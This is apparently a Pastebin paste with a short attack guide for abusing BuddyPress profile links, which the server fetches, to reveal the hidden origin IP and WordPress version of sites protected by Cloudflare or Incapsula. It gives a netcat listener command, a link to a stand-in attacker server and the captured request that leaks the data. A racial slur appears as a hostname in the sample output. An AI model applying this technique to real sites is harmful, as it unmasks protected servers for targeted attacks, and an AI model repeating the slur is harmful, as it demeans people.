m0rkus

BuddyPress Cloudflare Bypass

May 4th, 2019
1,082
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.           _
  2.            | |          mark
  3.            | |===( )   //////
  4.            |_|   |||  | o o|
  5.                   ||| ( c  )                  ____
  6.                    ||| \= /                  ||   \_
  7.                     ||||||                   ||     |  
  8.                     ||||||                ...||__/|-"
  9.                     ||||||             __|________|__
  10.                       |||             |______________|
  11.                       |||             || ||      || ||
  12.                       |||             || ||      || ||
  13. ------------------------|||-------------||-||------||-||-------
  14.  
  15.  
  16. Using BuddyPress to bypass CloudFlare/Incapsula + disclosure of WordPress Version:
  17.  
  18. While not as severe as the exploit described above, it should also be noted that BuddyPress can be abused to get the backend IP's of websites protected via the likes of Cloudflare. While performing this, it will also leak the version of wordpress in use (which is useful when it is not displayed via readme.txt or able to be discovered via wpscan)
  19.  
  20. On your profile, you can add links within the status section and these links will be displayed on your feed. Before being displayed, these links are first converted to an iframe -- during this conversion, the site running BuddyPress makes a direct connection to the link that you inputted to be displayed on your feed.
  21. You can setup a server and listen for incoming connections on a specific port through use of netcat, like so:
  22. Code
  23. [root@localhost ~]# nc -lv 1337
  24.  
  25. Now, add the following link in the status section of your BuddyPress Profile:
  26.  
  27. http://your-server.com/:1337
  28.  
  29. You will see the following error message: "There has been an error processing your request." but if you check your server for incoming connections, you should see something like this:
  30.  
  31. [root@nigger ~]# nc -lv 1337
  32. Connection from {BACKEND-IP-OF-BUDDYPRESS-SITE} port 1337 [tcp/krb524] accepted
  33. GET / HTTP/1.1
  34. User-Agent: WordPress/4.7.5; https://BUDDYPRESS-SITE.COM
  35. Host: your-server.com:1337
  36. Accept: */*
  37. Accept-Encoding: deflate, gzip
  38. Refer: http://your-server.com:1337
  39. Connection: close
  40.  
  41. resulting in both the wordpress version, and the backend IP of the website being disclosed.
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×